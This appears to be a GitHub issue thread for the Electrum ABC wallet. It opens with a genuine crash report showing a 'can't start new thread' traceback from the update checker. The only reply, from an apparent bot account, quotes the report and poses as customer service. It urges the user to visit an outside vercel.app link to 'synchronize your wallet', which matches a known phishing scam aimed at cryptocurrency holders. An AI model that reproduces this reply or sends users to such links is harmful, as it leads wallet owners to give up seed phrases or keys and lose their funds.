### ISSUE TITLE
RuntimeError: can't start new thread

### ISSUE THREAD

**Issue by lechangxu** [Bitcoin-ABC/bitcoin-abc#533]
# Description

# Traceback
```
Traceback (most recent call last):
  File "electrumabc_gui\qt\__init__.py", line 848, in on_auto_update_timeout
  File "electrumabc_gui\qt\update_checker.py", line 346, in do_check
  File "electrumabc_gui\qt\update_checker.py", line 413, in __init__
  File "threading.py", line 899, in start
RuntimeError: can't start new thread

```

# System information

- Electrum ABC version: 5.2.8
- Python version: 3.9.13 (tags/v3.9.13:6de2ca5, May 17 2022, 16:24:45) [MSC v.1929 32 bit (Intel)]
- Operating system: Windows-2012ServerR2-6.3.9600-SP0
- Wallet type: standard
- Locale: zh_CN

**Comment by AlexLiveBot11549** [comment]
> # Description
> 
> 
> 
> 
> 
> # Traceback
> 
> ```
> 
> Traceback (most recent call last):
> 
>   File "electrumabc_gui\qt\__init__.py", line 848, in on_auto_update_timeout
> 
>   File "electrumabc_gui\qt\update_checker.py", line 346, in do_check
> 
>   File "electrumabc_gui\qt\update_checker.py", line 413, in __init__
> 
>   File "threading.py", line 899, in start
> 
> RuntimeError: can't start new thread
> 
> 
> 
> ```
> 
> 
> 
> # System information
> 
> 
> 
> - Electrum ABC version: 5.2.8
> 
> - Python version: 3.9.13 (tags/v3.9.13:6de2ca5, May 17 2022, 16:24:45) [MSC v.1929 32 bit (Intel)]
> 
> - Operating system: Windows-2012ServerR2-6.3.9600-SP0
> 
> - Wallet type: standard
> 
> - Locale: zh_CN
> 
> 
> 
> 

Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/
